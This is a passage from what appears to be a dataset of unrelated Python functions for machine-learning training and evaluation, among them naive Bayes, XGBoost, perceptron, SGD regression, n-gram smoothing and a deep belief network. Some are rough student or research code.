epochsdrawrandom, epochswinminmax,\n epochsdrawminmax, training=False)\n\n if pwins + nwins == 0 or float(nwins) / (pwins + nwins) <= self.args.updateThreshold:\n print('REJECTING NEW MODEL')\n filename = \"curent\"+str(i)+\"temp:iter\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n filenameBest = \"best\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n exists = os.path.isfile(filenameBest)\n if exists:\n self.nnet.load_checkpoint(folder=self.args.checkpoint, filename=filenameBest)\n else:\n self.nnet.load_checkpoint(folder=self.args.checkpoint, filename=filename)\n\n else:\n print('ACCEPTING NEW MODEL')\n\n filename = \"best\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename=self.getCheckpointFile(i))\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename=filename)\n self.mcts.clear()\n del self.mcts\n self.mcts = MCTS(self.game, self.nnet, self.args, mcts=True) # reset search tree\n print(self.tracker.print_diff())\n self.writeLogsToFile(epochswin, epochdraw, training=True)", "def estimate_nb(x,y,smoothing):\n labels = set(y)\n doc_counts = defaultdict(float)\n weights = defaultdict(float)\n\n vocab = set()\n for base_features in x:\n for word in base_features.keys():\n vocab.add(word)\n\n for label in y:\n doc_counts[label] += 1\n\n\n 
for label in labels:\n weights[(label, OFFSET)] = np.log(doc_counts[label] / sum(doc_counts.values()))\n log_probabilities = estimate_pxy(x, y, label, smoothing, vocab)\n for word in log_probabilities:\n weights[(label, word)] = log_probabilities[word]\n\n return weights", "def train_and_score_bagging(network):\n\n train_predictions = pd.read_pickle('data/train_predictions.pkl.gz', compression='gzip')\n test_predictions = pd.read_pickle('data/test_predictions.pkl.gz', compression='gzip')\n\n train_actuals = pd.read_pickle('data/train_actuals.pkl.gz', compression='gzip')\n test_actuals = pd.read_pickle('data/test_actuals.pkl.gz', compression='gzip')\n\n\n train_x = np.array(train_predictions.values)\n train_y = train_actuals[0].values\n train_log_y = safe_log(train_y)\n test_x = np.array(test_predictions.values)\n test_y = test_actuals[0].values\n test_log_y = safe_log(test_y)\n\n model = compile_model(network)\n\n print('\\rNetwork')\n\n for property in network:\n print(property, ':', network[property])\n logging.info('%s: %s' % (property, network[property]))\n\n test = xgb.DMatrix(test_x)\n train = xgb.DMatrix(train_x, label=train_log_y)\n\n\n\n eval_set = [(test_x, test_log_y)]\n model.fit(train_x, train_log_y, early_stopping_rounds=20, eval_metric='mae', eval_set=eval_set,\n verbose=False)\n\n # eval_set = [(test, test_log_y)]\n # xgb.train(network, train, num_boost_round=5000, evals=eval_set, early_stopping_rounds=5)\n\n predictions = model.predict(test_x)\n # predictions = xgb.predict(test_x)\n inverse_predictions = safe_exp(predictions)\n score = mean_absolute_error(test_y, inverse_predictions)\n mape = safe_mape(test_y, inverse_predictions)\n\n print('\\rResults')\n\n best_round = xgb.best_iteration\n\n if np.isnan(score):\n score = 9999\n\n print('best round:', best_round)\n print('loss:', score)\n print('mape:', mape)\n print('-' * 20)\n\n logging.info('best round: %d' % best_round)\n logging.info('loss: %.4f' % score)\n logging.info('mape: %.4f' % mape)\n logging.info('-' * 20)\n\n eval_results({'xgb_predictions': {\n 'actual_y': test_y,\n 'y_predict': inverse_predictions\n }\n })\n\n range_results({\n 'xgb_predictions': inverse_predictions,\n }, test_y)", "def train(self, data, labels, validationData, validationLabels):\n \n # -- calls the classify method to evaluate performance \n # -- OUR CODE HERE\n \n legalLabels = labels\n self.legalLabels = legalLabels\n trainingData = validationData\n trainingLabels = validationLabels\n \n kCorrect = util.Counter()\n self.conditionalProb = []\n \n \n self.prior = util.Counter()\n for label in labels:\n self.prior[label] += 1.0\n self.prior.normalize()\n #for label in self.prior:\n # self.prior[label]/=len(trainingLabels)\n \n \"\"\"\n print \"legal labels are \", len(legalLabels)\n print \"kgrid is \", kgrid\n print \"the legal labels are.... \", legalLabels\n \"\"\"\n \n import time\n \n condprobForK = {}\n \n # -- iterate through each k in kgrid... should we be doing this?\n # -- won't this affect the cond prob tables? :(\n k = 0.5\n #print \"working on k = \",k,\" in kgrid\"\n \n # -- reset the conditonal prob table\n # -- each time we go through a different k...\n self.conditionalProb = {}\n \n # -- go through each label and initialize the Counter for that label (the cond prob table)\n for label in legalLabels:\n self.conditionalProb[label] = util.Counter()\n \n # -- go through each piece of training data and train the tables on it \n for dataNum in range(len(trainingData)):\n \n # -- identify which label we're using... 
not sure if this is correct\n label = trainingLabels[dataNum] # 0 or like 9 or 2\n \n # -- iterate through each pixel and update the conditional prob counter for that label\n for pixel in trainingData[dataNum]:\n \n if pixel is \"moreThanOneConnBlackRegions\":\n #print \"Number is :: \", label, \" and has \", trainingData[dataNum][pixel]\n assert 1 is 1\n \n on_off = trainingData[dataNum][pixel] * 1.0\n self.conditionalProb[label][pixel] += on_off * 1.0\n \n # -- now we go through and add k to each of the conditional probabilities\n # -- note that we do so for each label and every single pixel\n for label in legalLabels:\n for pixel in self.conditionalProb[label]: \n # -- add the k value \n self.conditionalProb[label][pixel] += k * 1.0\n assert self.conditionalProb[label][pixel] >= k # -- sanity check that it should be at least k\n self.conditionalProb[label][pixel] /= (self.prior[label] * len(trainingLabels) + k*2)\n \n \n \n # -- END OUR CODE", "def train_predict(self, xTrain, yTrain, xTest, yTest):\n trainStats = {}\n # TODO: DO SGD\n #beta = np.linalg.inv(xTrain.transpose().dot(xTrain)).dot(xTrain.transpose()).dot(yTrain)\n LinearRegression.beta = [[0],[0]]\n intercept = 0\n n = len(xTrain)\n startall = time.time()\n list = [x for x in range(0,len(xTrain))]\n for i in range(self.mEpoch):\n random.shuffle(list)\n Dbetalist = []\n Dinterceptlist = []\n start = time.time()\n for j in range(self.bs):\n # Dbetalist = []\n # Dinterceptlist = []\n indexstart = len(list)/self.bs * j\n indexend = len(list)/self.bs * j + len(list)/self.bs\n subset = xTrain[int(indexstart):int(indexend)]\n #print(subset)\n ypredict = np.dot(subset,LinearRegression.beta) + intercept\n subyTrain = yTrain[int(indexstart):int(indexend)]\n Dbeta = (-2/n)*sum(np.dot(subset.transpose(),(subyTrain-ypredict)))\n Dbetalist.append(Dbeta)\n Dintercept = (-2/n)*sum(subyTrain-ypredict)\n Dinterceptlist.append(Dintercept)\n\n end = time.time()\n timeElapse = end - start\n\n avgDbeta = sum(Dbetalist) / len(Dbetalist)\n avgDintercept = sum(Dinterceptlist) / len(Dinterceptlist)\n #print(avgDbeta)\n # print(avgDintercept)\n LinearRegression.beta = LinearRegression.beta - self.lr * avgDbeta\n #print(LinearRegression.beta)\n # print(beta)\n intercept = intercept - self.lr * avgDintercept\n\n value = {}\n value['time'] = timeElapse\n value['train-mse'] = LinearRegression.mse(LinearRegression, xTrain, yTrain)\n value['test-mse'] = LinearRegression.mse(LinearRegression, xTest, yTest)\n trainStats[i*self.bs] = value\n\n endall = time.time()\n totaltime = endall - startall\n\n\n return trainStats", "def compute_metrics(self, train_data, test_data, criterion):\n m = self.metrics\n warnings.filterwarnings('ignore','Mean of empty slice')\n\n ## load data\n trn, trn_labs = train_data\n tst, tst_labs = test_data\n\n # trn = trn.transpose(1,0)\n tst = tst.transpose(1,0)\n\n t_final = -(np.flipud(trn!=self.padding).argmax(0)+1)\n test_tfinal = -(np.flipud(tst!=self.padding).argmax(0)+1)\n\n ntest = tst.size(1)\n P = self.decoder.out_features\n\n ## training data ###########################################################\n # hidden = self.init_hidden(trn.size(1))\n # out, hidden = self.transparent_forward(trn, hidden)\n # # output = out[t_final, np.arange(trn.size(1)), :]\n # output = out.squeeze()\n # # compute orthogonality\n # mem_act = np.array([np.cumsum(trn==p,axis=0).int().detach().numpy() % 2 \\\n # for p in range(self.q_)]).transpose((1,2,0))\n\n # ps_clf = LinearDecoder(self, 2**(self.q_-1), MeanClassifier)\n # ps = []\n # for d in 
Dichotomies(mem_act, 'simple'):\n # np.warnings.filterwarnings('ignore',message='invalid value encountered in')\n # ps_clf.fit(hidden.detach().numpy(), d)\n # new_ps = ps_clf.orthogonality()\n # ps.append(new_ps)\n # # if new_ps > ps:\n # # ps = new_ps\n # m['train_parallelism'] = np.append(m['train_parallelism'], np.array(ps).T, axis=0)\n\n # # print(mem_act.shape)\n # # print(hidden.shape)\n # # self.orth_clf.fit(hidden.detach().numpy(), mem_act)\n # # orth_score = self.orth_clf.orthogonality()\n # # m['train_orthogonality'] = np.append(m['train_orthogonality'], orth_score)\n\n ## test data ##############################################################\n hidden = self.init_hidden(tst.size(1))\n out, hidden = self.transparent_forward(tst, hidden)\n # output = out.squeeze()\n # print(hidden.shape)\n # print(out.shape)\n # print(test_tfinal)\n output = out[test_tfinal, np.arange(tst.size(1)), :]\n # raise Exception\n\n # compute loss\n test_loss = criterion(output.squeeze(0),tst_labs.squeeze())\n\n m['test_loss'] = np.append(m['test_loss'], test_loss.item())\n\n # compute orthogonality\n # mem_act = np.array([np.cumsum(tst==p,axis=0).int().detach().numpy() % 2 \\\n # for p in range(self.q_)]).transpose((1,2,0))\n\n # # self.orth_clf.fit(hidden.detach().numpy(), mem_act)\n # # orth_score = self.orth_clf.orthogonality()\n # # m['test_orthogonality'] = np.append(m['test_orthogonality'], orth_score)\n\n # # compute parallelism\n # ps_clf = LinearDecoder(self, 2**(self.q_-1), MeanClassifier)\n # ps = []\n # for d in Dichotomies(mem_act, 'simple'):\n # np.warnings.filterwarnings('ignore',message='invalid value encountered in')\n # ps_clf.fit(hidden.detach().numpy(), d)\n # new_ps = ps_clf.orthogonality()\n # ps.append(new_ps)\n # # if new_ps > ps:\n # # ps = new_ps\n # m['test_parallelism'] = np.append(m['test_parallelism'], np.array(ps).T, axis=0)\n\n ## package #################################################################\n self.metrics = m\n warnings.filterwarnings('default')", "def _train_epoch(self, train_batches, dropout_keep_prob):\n total_num, total_loss = 0, 0\n log_every_n_batch, n_batch_loss = 50, 0\n for bitx, batch in enumerate(train_batches, 1):\n #self.check(batch)\n feed_dict = {self.p: batch['passage_token_ids'],\n self.q: batch['question_token_ids'],\n self.p_char: batch['passage_char_ids'],\n self.q_char: batch['question_char_ids'],\n self.p_length: batch['passage_length'],\n self.q_length: batch['question_length'],\n self.start_label: batch['start_id'],\n self.end_label: batch['end_id'],\n self.dropout_keep_prob: dropout_keep_prob}\n _, loss = self.sess.run([self.train_op, self.loss], feed_dict)\n total_loss += loss * len(batch['raw_data'])\n total_num += len(batch['raw_data'])\n n_batch_loss += loss\n if log_every_n_batch > 0 and bitx % log_every_n_batch == 0:\n self.logger.info('Average loss from batch {} to {} is {}'.format(\n bitx - log_every_n_batch + 1, bitx, n_batch_loss / log_every_n_batch))\n n_batch_loss = 0\n return 1.0 * total_loss / total_num", "def run_code_for_training_with_CrossEntropy_and_BCE_Losses(self, net):\n filename_for_out1 = \"performance_numbers_\" + str(self.dl_studio.epochs) + \"label.txt\"\n filename_for_out2 = \"performance_numbers_\" + str(self.dl_studio.epochs) + \"regres.txt\"\n FILE1 = open(filename_for_out1, 'w')\n FILE2 = open(filename_for_out2, 'w')\n net = copy.deepcopy(net)\n net = net.to(self.dl_studio.device)\n criterion1 = nn.CrossEntropyLoss()\n# criterion2 = self.dl_studio.DetectAndLocalize.IOULoss(self.dl_studio.batch_size)\n 
criterion2 = nn.BCELoss()\n optimizer = optim.SGD(net.parameters(), \n lr=self.dl_studio.learning_rate, momentum=self.dl_studio.momentum)\n for epoch in range(self.dl_studio.epochs): \n running_loss_labeling = 0.0\n running_loss_regression = 0.0 \n for i, data in enumerate(self.train_dataloader):\n gt_too_small = False\n inputs, bbox_gt, labels = data['image'], data['bbox'], data['label']\n if self.dl_studio.debug_train and i % 1000 == 999:\n print(\"\\n\\n[iter=%d:] Ground Truth: \" % (i+1) + \n ' '.join('%5s' % self.dataserver_train.class_labels[labels[j].item()] for j in range(self.dl_studio.batch_size)))\n inputs = inputs.to(self.dl_studio.device)\n labels = labels.to(self.dl_studio.device)\n bbox_gt = bbox_gt.to(self.dl_studio.device)\n optimizer.zero_grad()\n outputs = net(inputs)\n outputs_label = outputs[0]\n bbox_pred = outputs[1]\n if self.dl_studio.debug_train and i % 500 == 499:\n inputs_copy = inputs.detach().clone()\n inputs_copy = inputs_copy.cpu()\n bbox_pc = bbox_pred.detach().clone()\n bbox_pc[bbox_pc<0] = 0\n bbox_pc[bbox_pc>31] = 31\n _, predicted = torch.max(outputs_label.data, 1)\n print(\"[iter=%d:] Predicted Labels: \" % (i+1) + \n ' '.join('%10s' % self.dataserver_train.class_labels[predicted[j].item()] \n for j in range(self.dl_studio.batch_size)))\n for idx in range(self.dl_studio.batch_size):\n i1 = int(bbox_gt[idx][1])\n i2 = int(bbox_gt[idx][3])\n j1 = int(bbox_gt[idx][0])\n j2 = int(bbox_gt[idx][2])\n k1 = int(bbox_pc[idx][1])\n k2 = int(bbox_pc[idx][3])\n l1 = int(bbox_pc[idx][0])\n l2 = int(bbox_pc[idx][2])\n print(\" gt_bb: [%d,%d,%d,%d]\"%(j1,i1,j2,i2))\n print(\" pred_bb: [%d,%d,%d,%d]\"%(l1,k1,l2,k2))\n inputs_copy[idx,0,i1:i2,j1] = 255\n inputs_copy[idx,0,i1:i2,j2] = 255\n inputs_copy[idx,0,i1,j1:j2] = 255\n inputs_copy[idx,0,i2,j1:j2] = 255\n inputs_copy[idx,2,k1:k2,l1] = 255 \n inputs_copy[idx,2,k1:k2,l2] = 255\n inputs_copy[idx,2,k1,l1:l2] = 255\n inputs_copy[idx,2,k2,l1:l2] = 255\n self.dl_studio.display_tensor_as_image(\n torchvision.utils.make_grid(inputs_copy, normalize=True),\n \"see terminal for TRAINING results at iter=%d\" % (i+1))\n mask_regress = torch.zeros(self.dl_studio.batch_size,32,32,requires_grad=False)\n mask_gt = torch.zeros(self.dl_studio.batch_size, 32,32)\n for k,out_regres in enumerate(bbox_pred):\n x1,y1,x2,y2 = bbox_pred[k].tolist()\n x1_gt,y1_gt,x2_gt,y2_gt = bbox_gt[k].tolist()\n x1,y1,x2,y2 = [int(item) if item >0 else 0 for item in (x1,y1,x2,y2)]\n x1_gt,y1_gt,x2_gt,y2_gt = [int(item) if item>0 else 0 for item in (x1_gt,y1_gt,x2_gt,y2_gt)]\n if abs(x1_gt - x2_gt)<5 or abs(y1_gt-y2_gt) < 5: gt_too_small = True\n mask_regress_np = np.zeros((32,32), dtype=bool)\n mask_gt_np = np.zeros((32,32), dtype=bool)\n mask_regress_np[y1:y2,x1:x2] = 1\n mask_gt_np[y1_gt:y2_gt, x1_gt:x2_gt] = 1\n mask_regress[k,:,:] = torch.from_numpy(mask_regress_np)\n mask_regress.reqiures_grad=True\n mask_gt[k,:,:] = torch.from_numpy(mask_gt_np)\n mask_gt.reqiures_grad=True \n loss_labeling = criterion1(outputs_label, labels)\n loss_labeling.backward(retain_graph=True) \n loss_regression = criterion2(mask_regress, mask_gt)\n loss_regression.requires_grad = True\n loss_regression.backward()\n optimizer.step()\n running_loss_labeling += loss_labeling.item() \n running_loss_regression += loss_regression.item() \n if i % 1000 == 999: \n avg_loss_labeling = running_loss_labeling / float(1000)\n avg_loss_regression = running_loss_regression / float(1000)\n print(\"[epoch:%d, batch:%5d] loss_labeling: %.3f loss_regression: %.3f \" % (epoch + 1, i + 1, 
avg_loss_labeling, avg_loss_regression))\n FILE1.write(\"%.3f\\n\" % avg_loss_labeling)\n FILE1.flush()\n FILE2.write(\"%.3f\\n\" % avg_loss_regression)\n FILE2.flush()\n running_loss_labeling = 0.0\n running_loss_regression = 0.0\n print(\"\\nFinished Training\\n\")\n self.save_model(net)", "def _do_train_job(self, sentences, alpha, inits):\n work, neu1 = inits\n tally = 0\n if self.sg:\n if self.replication:\n logger.info('Training n2v with original code')\n tally += train_batch_sg_replication(self, sentences, alpha,\n work)\n else:\n logger.info('Training n2v with refactored code')\n tally += train_batch_sg(self, sentences, alpha, work)\n else:\n raise Exception('Nonce2Vec does not support cbow mode')\n return tally, self._raw_word_count(sentences)", "def train( self, trainingData, trainingLabels, validationData, validationLabels ):\n\n self.features = trainingData[0].keys() # could be useful later\n # DO NOT ZERO OUT YOUR WEIGHTS BEFORE STARTING TRAINING, OR\n # THE AUTOGRADER WILL LIKELY DEDUCT POINTS.\n for iteration in range(self.max_iterations):\n #pdb.set_trace() # esto es un break point para que puedas comprobar el formato de los datos\n print (\"Starting iteration \", iteration, \"...\")\n for i in range(len(trainingData)):#training data\n max = -10000000\n for j in range(len(self.weights)):\n prod = np.dot(self.weights[j], trainingData[i]) #este sería x0 (en la primera vuelta) (xj)\n if (prod > max):\n max=prod #en max guardamos la distancia a la instancia que más cerca está de la que estamos recorriendo\n indclase=j #guardas el índice de la clase a la que predices que pertenece\n\n if(indclase != trainingLabels[i]):\n # recalcular pesos\n self.weights[trainingLabels[i]].__radd__(trainingData[i]) #honek jarraian egiten du gehiketa pisu guztientzat\n #pdb.set_trace() # esto es un break point para que puedas comprobar el formato de los datos\n self.weights[indclase].__sub__(trainingData[i]) #honek jarraian egiten du kenketa pisu guztientzat\n\n\n\n\n\n ########################################################################################\n # 1. i es el indice de un ejemplo (un item, f(x) de un ejemplo) del conjunto de entrenamiento.\n # 2. Asi pues, en cada vuelta de este loop se trata un solo ejemplo\n # por cada ejemplo calculareis el producto punto (dotProduct) w*item\n # NOTAS: Recordad que cada ejemplo viene representado por varios rasgos (o features), es decir, es un vector de rasgos, tantos como nos marca el atributo self.features.\n # Asi cada ejemplo es de dimension 1 filas y self.features).\n # La dimension del vector w tambien es self.features, es decir, habra tantos pesos en w_rasgo dentro de w como rasgos haya en cada item de ejemplo\n # Recordad tambien que es una clasificacion multiclase en este caso. 
Hay tantas clases como nos marca el atributo self.legalLabels\n #########################################################################################", "def sgd(iterations):\n for iteration in range(0,iterations):\n error = []\n for user_id in range(0,latent_user_preferences.shape[0]):\n for item_id in range(0,latent_item_features.shape[0]):\n rating = user_ratings[user_id][item_id]\n if rating != 99:\n err = train(user_id, item_id, rating)\n error.append(err)\n mse = (np.array(error) ** 2).mean() \n if(iteration%1 == 0):#000 == 0 ):\n print(mse)\n return error", "def naiveBayes(train_set, train_labels, dev_set, smoothing_parameter, pos_prior):\n # TODO: Write your code here\n # return predicted labels of development set\n #\n ### len(train_set) 8000, len(dev) = 5000 P(pos) = 0.8 \n #### 0.55, 4.0, 0.30 ----------- 0.766\n #### 0.25 3.5 0.3 -------------- 0.766\n print(pos_prior)\n smoothing_parameter = 3.5\n pos_total_word = 0\n neg_total_word = 0\n pos_word_dict = {}\n neg_word_dict = {}\n dicts = [neg_word_dict, pos_word_dict]\n for i, sentence in enumerate(train_set):\n\n if train_labels[i] == 1: # positive reviews\n for word in sentence:\n pos_total_word += 1 \n if word in stop_words:\n continue\n if word in pos_word_dict:\n pos_word_dict[word] += 1\n else :\n pos_word_dict[word] = 1\n\n else: # negative reviews\n for word in sentence:\n neg_total_word += 1 \n if word in stop_words:\n continue\n if word in neg_word_dict:\n neg_word_dict[word] += 1\n else :\n neg_word_dict[word] = 1\n\n\n prob = {}\n denominator_pos = pos_total_word + smoothing_parameter * (len(pos_word_dict) + 1)\n denominator_neg = neg_total_word + smoothing_parameter * (len(neg_word_dict) + 1)\n de = [denominator_neg, denominator_pos]\n\n for t, dictionary in enumerate(dicts):\n for key, value in dictionary.items():\n if key not in prob:\n prob[key] = {0 : 0, 1 : 0}\n if smoothing_parameter != 0:\n prob[key][1 - t] = -1 * np.log(smoothing_parameter / de[t]) \n # print(prob[key][1 - t])\n\n prob[key][t] = -1 * np.log((value + smoothing_parameter) / de[t]) \n \n\n revised_prob = {}\n for key, value in prob.items():\n if np.abs(value[0] - value[1]) >= 0.25:\n revised_prob[key] = value \n\n print(len(revised_prob))\n\n dev_labels = []\n num_0 = 0\n for i, sentence in enumerate(dev_set):\n pos_odd = -1 * np.log(pos_prior)\n neg_odd = -1 * np.log(1.0 - pos_prior)\n for word in sentence:\n if word in revised_prob:\n pos_odd += revised_prob[word][1]\n neg_odd += revised_prob[word][0]\n \n if pos_odd > neg_odd:\n num_0 += 1\n dev_labels.append(1 if pos_odd <= neg_odd else 0)\n print(num_0)\n\n \n #### bigram model \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n return dev_labels", "def finetune_n_estimators_createData():\n acc, auc = [], []\n for i in tqdm([j*10 for j in range(1,31)],desc='Progress(n_estimators)',ncols=70,smoothing=0.5):\n X_train, X_test, y_train, y_test, X, y_binary = initializing()\n XGBCla = get_XGBmodel(n_est=i)\n XGBCla = XGBCla.fit(X_train, y_train)\n acc.append(accuracy_score(XGBCla.predict(X_test),y_test))\n auc.append(roc_auc_score(XGBCla.predict(X_test),y_test))\n np.save(\"npy-data/result_n_estimators_tuning_acc_auc_crossval_train\",acc+auc)", "def calculate_batch_metrics(self):\n pass", "def test_compute_metrics(self):\n with self.test_session() as sess:\n tf.set_random_seed(1234)\n dut = _setup_trainer(self.tmpdir)\n\n sess.run(tf.global_variables_initializer())\n sess.run((dut.train_iterator.initializer,\n dut.train_metric_reset_op))\n\n train_mloss = sess.run(dut.train_mean_loss)\n\n # Without 
update, it should be zero.\n self.assertEqual(train_mloss, 0.)\n\n sess.run((dut.train_op, dut.train_mean_loss_update_op))\n\n train_mloss = sess.run(dut.train_mean_loss)\n\n # After update.\n self.assertAlmostEqual(train_mloss, 5.2298584)", "def __init__(self, n, sents, corpus='', beta=None, addone=True):\n self.n = n\n self.beta = beta\n self.corpus = corpus\n self.beta_flag = True\n self.addone = addone\n self.smoothingtechnique = 'Back Off (Katz) with Discounting Smoothing'\n self.counts = counts = defaultdict(int)\n self.A_set = defaultdict(set)\n voc = ['</s>']\n for s in sents:\n voc += s\n self.voc = set(voc)\n if beta is None:\n self.beta_flag = False\n\n # if no beta given, we compute it\n if not self.beta_flag:\n total_sents = len(sents)\n aux = int(total_sents * 90 / 100)\n # 90 per cent por training\n train_sents = sents[:aux]\n # 10 per cent for perplexity (held out data)\n held_out_sents = sents[-total_sents+aux:]\n\n train_sents = list(map((lambda x: ['<s>']*(n-1) + x), train_sents))\n train_sents = list(map((lambda x: x + ['</s>']), train_sents))\n for sent in train_sents:\n for j in range(n+1):\n for i in range(n-j, len(sent) - j + 1):\n ngram = tuple(sent[i: i + j])\n counts[ngram] += 1\n # for efficiency, we save the A set as a dict of sets\n if j:\n self.A_set[ngram[:-1]].add(ngram[-1])\n for i in range(1, n):\n counts[('<s>',)*i] += len(train_sents)\n counts[('</s>',)] = len(train_sents)\n\n self.tocounts = counts\n # search for the beta that gives lower perplexity\n beta_candidates = [i*0.1 for i in range(1, 10)]\n # xs is a list with (beta, perplexity)\n xs = []\n self.sents = train_sents\n for aux_beta in beta_candidates:\n self.beta = aux_beta\n aux_perx = self.perplexity(held_out_sents)\n xs.append((aux_beta, aux_perx))\n xs.sort(key=lambda x: x[1])\n self.beta = xs[0][0]\n with open('old-stuff/backoff_'+str(n)+'_parameters_'+corpus, 'a') as f:\n f.write('Order: {}\\n'.format(self.n))\n f.write('Beta: {}\\n'.format(self.beta))\n f.write('AddOne: {}\\n'.format(self.addone))\n f.write('Perplexity observed: {}\\n'.format(xs[0][1]))\n f.write('-------------------------------\\n')\n f.close()\n else:\n sents = list(map((lambda x: x + ['</s>']), sents))\n sents = list(map((lambda x: ['<s>']*(n-1) + x), sents))\n\n for sent in sents:\n for j in range(n+1):\n for i in range(n-j, len(sent) - j + 1):\n ngram = tuple(sent[i: i + j])\n counts[ngram] += 1\n # for efficiency, we save the A set as a dict of sets\n if j:\n self.A_set[ngram[:-1]].add(ngram[-1])\n for i in range(1, n):\n counts[('<s>',)*i] += len(sents)\n counts[('</s>',)] = len(sents)", "def test_DBN(finetune_lr=0.1, pretraining_epochs=100,\n pretrain_lr=0.01, k=1, training_epochs=1000,\n dataset='mnist.pkl.gz', batch_size=10):\n\n datasets = load_data(dataset)\n\n train_set_x, train_set_y = datasets[0]\n valid_set_x, valid_set_y = datasets[1]\n test_set_x, test_set_y = datasets[2]\n\n # compute number of minibatches for training, validation and testing\n n_train_batches = train_set_x.get_value(borrow=True).shape[0] / batch_size\n\n # numpy random generator\n numpy_rng = numpy.random.RandomState(123)\n print('... building the model')\n # construct the Deep Belief Network\n dbn = DBN(numpy_rng=numpy_rng, n_ins=28 * 28,\n hidden_layers_sizes=[1000, 1000, 1000],\n n_outs=10)\n\n # start-snippet-2\n #########################\n # PRETRAINING THE MODEL #\n #########################\n print('... 
getting the pretraining functions')\n pretraining_fns = dbn.pretraining_functions(train_set_x=train_set_x,\n batch_size=batch_size,\n k=k)\n\n print('... pre-training the model')\n start_time = timeit.default_timer()\n ## Pre-train layer-wise\n for i in range(dbn.n_layers):\n # go through pretraining epochs\n for epoch in range(pretraining_epochs):\n # go through the training set\n c = []\n for batch_index in range(int(n_train_batches)):\n c.append(pretraining_fns[i](index=batch_index,\n lr=pretrain_lr))\n print('Pre-training layer %i, epoch %d, cost ' % (i, epoch), end=' ')\n print(numpy.mean(c))\n\n end_time = timeit.default_timer()\n # end-snippet-2\n print(('The pretraining code for file ' +\n os.path.split(__file__)[1] +\n ' ran for %.2fm' % ((end_time - start_time) / 60.)), file=sys.stderr)\n ########################\n # FINETUNING THE MODEL #\n ########################\n\n # get the training, validation and testing function for the model\n print('... getting the finetuning functions')\n train_fn, validate_model, test_model = dbn.build_finetune_functions(\n datasets=datasets,\n batch_size=batch_size,\n learning_rate=finetune_lr\n )\n\n print('... finetuning the model')\n # early-stopping parameters\n patience = 4 * n_train_batches # look as this many examples regardless\n patience_increase = 2. # wait this much longer when a new best is\n # found\n improvement_threshold = 0.995 # a relative improvement of this much is\n # considered significant\n validation_frequency = min(n_train_batches, patience / 2)\n # go through this many\n # minibatches before checking the network\n # on the validation set; in this case we\n # check every epoch\n\n best_validation_loss = numpy.inf\n test_score = 0.\n start_time = timeit.default_timer()\n\n done_looping = False\n epoch = 0\n\n while (epoch < training_epochs) and (not done_looping):\n epoch = epoch + 1\n for minibatch_index in range(int(n_train_batches)):\n\n minibatch_avg_cost = train_fn(minibatch_index)\n iter = (epoch - 1) * n_train_batches + minibatch_index\n\n if (iter + 1) % validation_frequency == 0:\n\n validation_losses = validate_model()\n this_validation_loss = numpy.mean(validation_losses)\n print((\n 'epoch %i, minibatch %i/%i, validation error %f %%'\n % (\n epoch,\n minibatch_index + 1,\n n_train_batches,\n this_validation_loss * 100.\n )\n ))\n\n # if we got the best validation score until now\n if this_validation_loss < best_validation_loss:\n\n #improve patience if loss improvement is good enough\n if (\n this_validation_loss < best_validation_loss *\n improvement_threshold\n ):\n patience = max(patience, iter * patience_increase)\n\n # save best validation score and iteration number\n best_validation_loss = this_validation_loss\n best_iter = iter\n\n # test it on the test set\n test_losses = test_model()\n test_score = numpy.mean(test_losses)\n print(((' epoch %i, minibatch %i/%i, test error of '\n 'best model %f %%') %\n (epoch, minibatch_index + 1, n_train_batches,\n test_score * 100.)))\n\n if patience <= iter:\n done_looping = True\n break\n\n end_time = timeit.default_timer()\n print((\n (\n 'Optimization complete with best validation score of %f %%, '\n 'obtained at iteration %i, '\n 'with test performance %f %%'\n ) % (best_validation_loss * 100., best_iter + 1, test_score * 100.)\n ))\n print(('The fine tuning code for file ' +\n os.path.split(__file__)[1] +\n ' ran for %.2fm' % ((end_time - start_time)\n / 60.)), file=sys.stderr)", "def get_nml_probs(x, model, data=None, normalize=True, num_classes=2, 
query_point_weight=20, dist_weight_thresh=None, \n num_grad_steps=10, lr=0.01, batch_size=32, grad_penalty=None, verbose=False, \n show_plots=False, plotting_2d=False, return_params=False):\n results = []\n data = data or DEFAULT_DATA\n orig_inputs, orig_targets = data\n \n if show_plots and plotting_2d:\n plt.figure()\n plt.title(f\"Original rewards\")\n plot_rewards(model, contours=True)\n plot_dataset(data)\n \n marker_for_class = {\n 0: 'x',\n 1: '*'\n }\n \n model.cuda()\n num_batches = ceil(len(orig_inputs) / batch_size)\n\n # NOTE train on gpu, move back to cpu for eval\n \n for proposed_class in range(num_classes):\n new_model = copy.deepcopy(model)\n new_model.cuda()\n \n # Sample all of the adaptation batches in advance\n optimizer = optim.SGD(new_model.parameters(), lr=lr)\n \n for _ in range(num_grad_steps):\n idxs = np.random.permutation(range(len(orig_inputs)))[:batch_size-1]\n X, y = orig_inputs[idxs], orig_targets[idxs]\n X = torch.Tensor(np.vstack((X, x))).cuda()\n y = torch.Tensor(np.hstack((y, proposed_class))).long().cuda()\n \n logits = new_model(X)\n loss = F.cross_entropy(logits, y, reduction='none')\n \n if dist_weight_thresh:\n weights = np.exp(-np.linalg.norm(x - X.cpu().numpy(), axis=-1) * 2.3 / dist_weight_thresh)\n else:\n weights = np.ones(len(y))\n \n weights[-1] *= query_point_weight * 1. / num_batches\n weights = torch.Tensor(weights).cuda()\n loss = torch.sum(loss * weights) / torch.sum(weights)\n \n loss.backward()\n optimizer.step()\n \n new_model.cpu()\n \n with torch.no_grad():\n x_tensor = torch.Tensor(x[None])\n probs = torch.softmax(new_model(x_tensor), -1)\n results.append(probs[0][proposed_class].item())\n \n if show_plots:\n new_model.to(torch.device(\"cpu\"))\n\n if plotting_2d: \n plt.figure()\n plot_rewards(new_model, contours=True, env = False, title=f\"Finetuning on label {proposed_class}\")\n plot_dataset(data)\n plt.scatter(x[0], x[1], marker=marker_for_class[proposed_class], color='w', s=100)\n \n plt.figure()\n plt.title(f\"Losses for label {proposed_class}\")\n plt.plot(losses)\n \n plt.figure()\n plt.title(f\"x loss for label {proposed_class}\")\n plt.plot(x_losses)\n \n plt.figure()\n plt.title(f\"x probs for label {proposed_class}\")\n plt.plot(x_vals)\n \n model.cpu()\n \n if normalize:\n results = 